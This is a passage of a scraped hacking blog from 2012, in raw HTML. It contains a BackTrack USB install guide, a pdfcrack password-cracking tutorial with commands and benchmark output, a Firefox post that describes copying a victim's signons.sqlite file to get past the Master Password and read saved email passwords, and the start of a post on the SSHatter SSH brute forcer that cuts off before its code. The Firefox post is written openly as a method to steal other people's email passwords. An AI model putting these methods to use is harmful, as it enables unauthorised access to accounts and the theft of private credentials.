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" style="background-color: transparent; border: 1px solid black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="415" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
A quick and simple guide to install your BT5 on a live USB drive.</div>
<ol style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Plug in your USB drive (larger than 2GB).</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Format it to FAT32.</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Download Unetbootin from <a href="http://unetbootin.sourceforge.net/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Unetbootin">http://unetbootin.sourceforge.net</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Start Unetbootin and select “Diskimage” ( BT5 .iso file)</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Select your USB drive and select “OK”.</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Exit or Reboot.</li>
</ol>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Enjoy!</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-20085268231817053572012-07-16T14:37:00.000+06:002012-07-16T14:37:13.774+06:00Crack pdf password with pdfcrack<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<a href="http://pdfcrack.sourceforge.net/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">PDFCrack</a> is a GNU/<a href="http://mediakey.dk/~cc/category/c-linux/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="Linux">Linux</a> application (or any other POSIX-compatible system) tool for recovering passwords and content from <a href="http://en.wikipedia.org/wiki/Portable_Document_Format" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">PDF</a>-files. It is small, command line driven without external dependencies. PDFCrack is released under <a href="http://www.gnu.org/copyleft/gpl.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">GPL</a>.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Install and pdfcrack on <a href="http://www.ubuntu.com/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="Ubuntu">Ubuntu</a> by typing:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<code style="border-left-color: rgb(42, 46, 47); border-left-style: solid; border-width: 0px 0px 0px 1px; color: #197b30; display: block; font-family: 'Courier New', mono; margin: 0px; outline: 0px; padding: 5px 10px; vertical-align: baseline;">cc@zeus:~$ sudo aptitude install pdfcrack</code></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Run a quick cracking power benchmark:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<code style="border-left-color: rgb(42, 46, 47); border-left-style: solid; border-width: 0px 0px 0px 1px; color: #197b30; display: block; font-family: 'Courier New', mono; margin: 0px; outline: 0px; padding: 5px 10px; vertical-align: baseline;">cc@zeus:~/Desktop$ pdfcrack -b<br style="margin: 0px; padding: 0px;" />Benchmark: Average Speed (calls / second):<br style="margin: 0px; padding: 0px;" />MD5: 1728972.6<br style="margin: 0px; padding: 0px;" />MD5_50 (fast): 97879.3<br style="margin: 0px; padding: 0px;" />MD5_50 (slow): 69167.0</code></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<code style="border-left-color: rgb(42, 46, 47); border-left-style: solid; border-width: 0px 0px 0px 1px; color: #197b30; display: block; font-family: 'Courier New', mono; margin: 0px; outline: 0px; padding: 5px 10px; vertical-align: baseline;"></code></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
RC4 (40, static): 606555.3<br style="margin: 0px; padding: 0px;" />RC4 (40, no check): 598050.0<br style="margin: 0px; padding: 0px;" />RC4 (128, no check): 590141.7</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
Benchmark: Average Speed (passwords / second):<br style="margin: 0px; padding: 0px;" />PDF (40, user): 453510.2<br style="margin: 0px; padding: 0px;" />PDF (40, owner): 220250.0<br style="margin: 0px; padding: 0px;" />PDF (40, owner, fast): 499995.0</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<code style="border-left-color: rgb(42, 46, 47); border-left-style: solid; border-width: 0px 0px 0px 1px; color: #197b30; display: block; font-family: 'Courier New', mono; margin: 0px; outline: 0px; padding: 5px 10px; vertical-align: baseline;">PDF (128, user): 22000.0<br style="margin: 0px; padding: 0px;" />PDF (128, owner): 10408.7<br style="margin: 0px; padding: 0px;" />PDF (128, owner, fast): 22220.0<br style="margin: 0px; padding: 0px;" />cc@zeus:~/Desktop$</code></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Use the pdfcrack to crack an encrypted pdf-file by typing:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<code style="border-left-color: rgb(42, 46, 47); border-left-style: solid; border-width: 0px 0px 0px 1px; color: #197b30; display: block; font-family: 'Courier New', mono; margin: 0px; outline: 0px; padding: 5px 10px; vertical-align: baseline;">cc@zeus:~/Desktop$ pdfcrack test.pdf</code></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Happy pdf-hacking and cracking</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3436039399135336524.post-50169329374869120272012-07-16T14:35:00.002+06:002012-07-16T14:36:07.180+06:00Firefox – How to retrieve and decrypt stored passwords<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Firefox is one of the most popular browsers of the world. We all are Firefox lovers. Firefox has grown so popular thanks to its various addons and extensions which make Firefox really easily customizable to suit our needs. So, we will now discuss <strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">how to retrieve and decrypt stored password using another computer.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Things which are necessary for this hack to be successfull:<br style="margin: 0px; padding: 0px;" />1. Physical access to victim machine<br style="margin: 0px; padding: 0px;" />2. Victim’s passwords saved in victim’s Firefox.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Usually, whenever passwords are stored in Firefox, they can be easily seen by going to Tools -> Options ->Security and hitting on Saved Passwords.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
But, if the victim if shrewd enough to use Master Password, on hitting Saved Passwords, you are prompted to enter Master Password. Master Password thus protects victim’s password from being seen by any stranger and you are unable to hack his Email passwords which are stored in Firefox browser.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="How to hack email accounts" src="http://i265.photobucket.com/albums/ii207/rajvid9/Masterpasswordrequired.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
This article shows you how to bypass Master Password of victim Firefox. So, follow the steps below to hack his Email account password, even if Master Password is in role.</div>
<h2 style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 18px; line-height: 22px; margin: 0px 0px 5px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Steps to retrieve and decrypt stored passwords:</h2>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Let us assume that victim uses Vista Operating system and you(hacker) are using Windows XP.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
1. On victim computer, go to:<br style="margin: 0px; padding: 0px;" />For Windows Vista:<br style="margin: 0px; padding: 0px;" />C:\Users\RAJ\AppData\Roaming\Mozilla\Firefox\Profiles\iosjcyzp.default<br style="margin: 0px; padding: 0px;" />For Windows XP:<br style="margin: 0px; padding: 0px;" />C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\tez96yyu.default</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-953" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Replace RAJ and Administrator with your victim’s computer username.<br style="margin: 0px; padding: 0px;" />and copy “signons.sqlite” file to your pen drive or any removable drive.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Stored password hack email" src="http://i265.photobucket.com/albums/ii207/rajvid9/Signons.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Note: If you are unable to find “signons.sqlite”, simply go to C drive and search for “signons.sqlite”. You will get it for sure.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
2. Now, come back to your computer and paste this “signons.sqlite” in your Firefox by using the path in Step 1.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Firefox hack copy signons.sqlite file" src="http://i265.photobucket.com/albums/ii207/rajvid9/HowtohackEmailpassword.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
3. After you’ve pasted “signons.sqlite” file in your firefox, open Firefox browser.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
4. Go to Tools -> Options -> Security tab. Hit on “Show password” and this time, you will be able to see victim mail accounts in popup box. Hit on “Show password” again and you will be able to see his hacked email account passwords. Now, you don’t have to enter any Master password.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacked Email passwords using Firefox" src="http://i265.photobucket.com/albums/ii207/rajvid9/Hackedemailaccountpasswords.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<br /></div>
<h2 style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 18px; line-height: 22px; margin: 0px 0px 5px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
What is Logic behind this Firefox hack???</h2>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Firefox stores all the remembered passwords in two files:<br style="margin: 0px; padding: 0px;" />1. Signons.sqlite and<br style="margin: 0px; padding: 0px;" />2. Key3</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Signons.sqlite is used to store all online username and passwords in encrypted form while Key3 file stores information about Master Password. So, in this hack, we are stealing victim’s Signons.sqlite file (and not Key3) and opening it in our Firefox. Naturally, our Firefox shows victim’s password and thus, we are able to hack email acccount passwords.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Really, this is one of the most vulnerable aspects of Firefox. Infact, Firefox stealers use this same logic for stealing Firefox saved passwords and thus to <strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">hack email accounts of victim.</strong> I have tried my best to keep this tutorial simple. If you have any problem in this <em style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Firefox hack to hack Email accounts of the victim,</em>please mention it in comments.</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3436039399135336524.post-31937053297072216272012-07-16T14:34:00.003+06:002012-07-16T14:34:25.876+06:00SSHatter – SSH Brute Forcer<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
Download:</div>
<pre style="background-color: transparent; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.anonym.to/?http://freshmeat.net/projects/sshatter/?branch_id=70781&release_id=263196" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://freshmeat.net/projects/sshatt...ease_id=263196</a></pre>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Essentially the tool is comprised of a small Perl file. The utility requires a few non-standard Perl libraries but these are easily installed. You must have Perl installed to use SSHatter.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Installing SSHatter<br style="margin: 0px; padding: 0px;" />First download and unpack the tool</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
